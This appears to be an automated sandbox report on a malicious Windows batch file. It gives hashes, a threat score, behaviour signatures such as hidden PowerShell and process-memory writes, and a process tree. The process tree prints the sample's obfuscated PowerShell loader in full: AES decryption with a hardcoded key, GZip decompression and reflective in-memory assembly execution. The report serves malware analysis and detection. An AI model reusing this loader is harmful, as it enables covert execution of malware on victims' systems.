Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
28-01-2025 06:24
Static task
static1
Behavioral task
behavioral1
Sample
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat
Resource
win7-20241023-en
windows7-x64
4 signatures
150 seconds
General
-
Target
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat
-
Size
3.5MB
-
MD5
baea34214aa1a2aa90de5d0b3d841882
-
SHA1
5206d25733b9fcf0c4b52fb3002b8f5def87699d
-
SHA256
69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0
-
SHA512
7e906e15de93a06eb763d069ea07ca763e4e0fe0d8cb3a804aded05ac5063d65ef09fa2d130abce268d1c3fcee96b28701f6d1b9a612bd1b1dbcd0f0b53a5d3d
-
SSDEEP
49152:a066fNaUEnvOthWSIdX+H3bjAq+hbPVjS:n
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 752 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 752 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1556 wrote to memory of 2672 1556 cmd.exe 31 PID 1556 wrote to memory of 2672 1556 cmd.exe 31 PID 1556 wrote to memory of 2672 1556 cmd.exe 31 PID 1556 wrote to memory of 752 1556 cmd.exe 32 PID 1556 wrote to memory of 752 1556 cmd.exe 32 PID 1556 wrote to memory of 752 1556 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function pPrLV($xjezz){ $wMHou=[System.Security.Cryptography.Aes]::Create(); $wMHou.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wMHou.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wMHou.Key=[System.Convert]::FromBase64String('lO1Vwq/nj9Puc/oGonhZjSQq/nzSWIn0lm/0BxXEcbE='); $wMHou.IV=[System.Convert]::FromBase64String('Z8/xZ+jsEzHKXXOs4H9TJQ=='); $LmFjs=$wMHou.CreateDecryptor(); $ZsDwh=$LmFjs.TransformFinalBlock($xjezz, 0, $xjezz.Length); $LmFjs.Dispose(); $wMHou.Dispose(); $ZsDwh;}function gbxhW($xjezz){ IEX '$Ovdns=New-Object System.IO.M*em*or*yS*tr*ea*m(,$xjezz);'.Replace('*', ''); IEX '$pBnCe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$KPnRz=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Ovdns, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $KPnRz.CopyTo($pBnCe); $KPnRz.Dispose(); $Ovdns.Dispose(); $pBnCe.Dispose(); $pBnCe.ToArray();}function DUZhs($xjezz,$VPKjP){ IEX '$osgqK=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$xjezz);'.Replace('*', ''); IEX '$vIuGg=$osgqK.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$vIuGg.*I*n*v*o*k*e*($null, $VPKjP);'.Replace('*', '');}$IVcAh = 'C:\Users\Admin\AppData\Local\Temp\69e99e962f784f1d4ac17447a74741ff7da3efe70522df9a7bc070b431e4bec0.bat';$host.UI.RawUI.WindowTitle = $IVcAh;$vvRPw=[System.IO.File]::ReadAllText($IVcAh).Split([Environment]::NewLine);foreach ($OSbaK in $vvRPw) { if ($OSbaK.StartsWith(':: ')) { $wgCug=$OSbaK.Substring(3); break; }}$IWIwq=[string[]]$wgCug.Split('\');IEX '$VTaqv=gbxhW (pPrLV ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($IWIwq[0])));'.Replace('*', '');IEX '$ZEjBw=gbxhW (pPrLV ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($IWIwq[1])));'.Replace('*', '');DUZhs $VTaqv $null;DUZhs $ZEjBw (,[string[]] ('')); "2⤵PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-